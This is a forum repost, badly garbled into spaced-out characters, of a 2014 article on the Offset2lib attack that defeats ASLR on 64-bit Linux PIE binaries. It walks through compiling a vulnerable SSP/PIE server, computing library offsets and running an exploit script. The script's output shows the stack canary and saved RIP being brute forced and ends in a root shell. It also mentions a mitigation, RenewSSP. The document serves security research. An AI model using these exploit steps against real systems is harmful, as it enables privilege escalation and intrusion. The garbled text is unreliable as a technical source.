搜索

[8518] 2014-12-23_Offset2lib攻击测试:看我如何全面绕过64位Linux的内核防护

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2014-12-23_Offset2lib攻击测试:看我如何全面绕过64位Linux的内核防护 O f f s e t 2 l i b 6 4 L i n u x F r e e B u f   2 0 1 4 - 1 2 - 2 3 ( ) ! ( A S L R ) A S L R P I E A S L R P I E G N U / L i n u x A S L R O f f s e t 2 l i b G N U / L i n u x A S L R 使 使 ( N X ) ( A S L R ) ( S S P ) s h e l l F r e e B u f l i b c L i n u x A N S I   C   A N S I   C C C f o r k R O P R e t u r n   O r i e n t a t e d   P r o g r a m m i n g r e t 2 l i b c , G r s e c u r i t y / P a X P a X m e m o r y   c o r r u p t i o n G r s e c u r i t y P a X G e n t o o D e b i a n   M e m p o 使 G r s e c u r i t y / P a X A S L R A S L R G N U / L i n u x 6 4 P I E A S L R G N U / L i n u x 1 . 2 . o f f s e t 2 l i b O f f s e t 2 l i b s a v e d - I P ( ) 线 A S L R f o r k G N U / L i n u x R O P s h e l l 线 1 . 2 . s a v e d - I P 3 . 4 . o f f s e t 2 l i b 5 . 2 4 H a r d c o d e d 线
1 2 F r o m   t h e   E L F s a v e d - I P 2 8 ( U n k n o w n ) b y t e - f o r - b y t e s a v e d - I P 3 . 5 2 8 使 s a v e d - I P A p p _ b a s e   =   ( s a v e d I P   &   0 x F F F ) - ( C A L L E R _ P A G E _ O F F S E T   < <   1 2 ) 0 x 0 0 0 0 7 F 3 6 C 6 f E B 0 0 0 o f f s e t 2 l i b o f f s e t 2 l i b o f f s e t 2 l i b L i n u x D i s t r i b u t i o n   L i b c   v e r .   O f f s e t 2 l i b C e n t O S   6 . 5         2 . 1 2         0 x 5 b 6 0 0 0         D e b i a n   7 . 1         2 . 1 3         0 x 5 a c 0 0 0         U b u n t u   1 2 . 0 4         2 . 1 5         0 x 5 e 4 0 0 0         U b u n t u   1 2 . 1 0         2 . 1 5         0 x 5 e 4 0 0 0 l i b c o f f s e t 2 l i b L i b c _ b a s e   =   A p p _ b a s e   -   o f f s e t 2 l i b A S L R   o f f s e t 2 l i b o f f s e t 2 l i b 1 . l i b c o f f s e t 2 l i b g e t _ o f f s e t 2 l i b . t g z 2 .   v u l n - s e r v e r - 6 4 b i t . t g z 3 . p y t h o n e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y $   t a r   x v f   v u l n - s e r v e r - 6 4 b i t . t g z s e r v e r _ 6 4 _ P I E _ S S P . c M a k e f i l e $   m a k e r m   - f   s e r v e r _ 6 4 _ P I E _ S S P   g c c   s e r v e r _ 6 4 _ P I E _ S S P . c   - o   s e r v e r _ 6 4 _ P I E _ S S P   - m 6 4   - W a l l   - f P I E   - p i e   - f s t a c k - p r o t e c t o r - a l l $   s u d o   / e t c / i n i t . d / a p p o r t   s t o p     #   a v o i d   c r e a t i n g   c o r e s   o n   c r a s h e s   ( s p e e d - u p ) $   s u d o   . / s e r v e r _ 6 4 _ P I E _ S S P   S t a r t i n g   s e r v e r   o n   p o r t   [ 9 9 9 9 ] o f f e t s 2 l i b ( ) $   t a r   x v f   g e t _ o f f s e t 2 l i b . t g z M a k e f i l e . o f f s e t 2 l i b g e t _ o f f s e t 2 l i b . c $   m a k e   - f   M a k e f i l e . o f f s e t 2 l i b $   . / g e t _ o f f s e t 2 l i b - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - = = = = = = = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - = = = = = = = = = = = = = = = = = = = = = = = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       A u t h o r s :   H e c t o r   M a r c o - G i s b e r t   < h m a r c o @ h m a r c o . o r g >                         I s m a e l   R i p o l l   R i p o l l   < i r i p o l l @ u p v . e s >       C o m m e n t :   S c r i p t   t o   o b t a i n   t h e   o f f s e t 2 l i b   v a l u e   o f   t h i s   m a c h i n e .       A t t a c k :   h t t p : / / c y b e r s e c u r i t y . u p v . e s / a t t a c k s / o f f s e t 2 l i b / o f f s e t 2 l i b . h t m l - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - = = = = = = = = = = = = = = = = = = = = = = = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - = = = = = = = - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - O f f s e t 2 l i b   ( l i b c ) :   0 x 5 f 0 0 0 0 e x p : $   s e d   - i   ' s / ( O F F S E T _ T O _ L I B C ) . * = . * / 1 = 0 x 5 f 0 0 0 0 / '                                       e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y     $   o b j d u m p   - d   s e r v e r _ 6 4 _ P I E _ S S P |   g r e p   - A 1   v u l n e r a b l e _ f u n c t i o n > $         1 1 4 9 : e 8   8 2   f c   f f   f f               c a l l q     d d 0   < v u l n e r a b l e _ f u n c t i o n >       1 1 4 e : 4 8   8 d   4 5   c 0                     l e a         - 0 x 4 0 ( % r b p ) , % r a x $   s e d   - i   ' s / ( P A G E _ N U M B E R _ O F _ N E X T _ I N S T R U C T I O N _ T O _ C A L L ) . * = . * / 1 = 0 x 1 / '                                     e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y   $   s e d   - i   ' s / ( O F F S E T _ S A V E D _ R I P ) . * = . * / 1 = 0 x 1 4 e / '                                     e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y e x p $   c h m o d   a + x   e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y   $   . / e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y   e x p l o i t - s e r v e r _ 6 4 _ P I E . p y   - s   < s e r v e r >   - p   < p o r t > $   . / e x p l o i t - o f f s e t 2 l i b - u b u n t u - 1 4 . 0 4 . 1 - L T S . p y   - s   l o c a l h o s t   - p   9 9 9 9 [ + ]   E x p l o i t   A S L R   6 4   b i t   s y s t e m s   [ + ]   T r y i n g   t o   f i n d   o u t   t h e   c a n a r y   o f f s e t         [ + ]   O f f s e t   i s   5 6   b y t e s [ + ]   B r u t e   f o r c i n g   s t a c k   c a n a r y         [ + ]   S S P   v a l u e   i s   0 x 6 0 e 0 7 9 2 a 5 2 3 e b 9 0 0 [ + ]   B r u t e   f o r c i n g   R B P         [ + ]   E B P   v a l u e   i s   0 x 0 0 0 0 7 f f f 0 e 7 9 d 1 6 0 [ + ]   B r u t e   f o r c i n g   S a v e d   R I P         [ + ]   R I P   v a l u e   i s   0 x 0 0 0 0 7 f 4 4 a 1 9 b 1 1 4 e [ + ]   T e x t   B a s e   a t   0 x 0 0 0 0 7 f 4 4 a 1 9 b 0 0 0 0 [ + ]   L i b c   B a s e   a t   0 x 0 0 0 0 7 f 4 4 a 1 3 c 0 0 0 0 [ + ]   G e t t i n g   s h e l l   . . . r o o t @ t e s t : / h o m e / t e s t   #   i d i d u i d = 0 ( r o o t )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) r o o t @ t e s t : / h o m e / t e s t   #
1 . P a X G R S e c u r i t y P a X P a X d e l t a _ e x e c b s s b r k d e l t a _ m m a p 线 d e l t a _ s t a c k P a x 使 P I E A S L R 2   A S L R v 3 o f f s e t 2 l i b L i n u x 3 . 1 8 - r c 7 3 . 使 使 R e n e w S S P 使 P o C A S L R S S P S S P P o C r e n e w S S P S S P S S P S S P b y t e - f o r - b y t e 使 使 R e n e w S S P h t t p : / / r e n e w s s p . c o m / d a t a / r e n e w s s p . m p 4 [ c y b e r s e c u r i t y s o l i d o t i n s i g h t - l a b s F r e e B u f d a w n e r F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理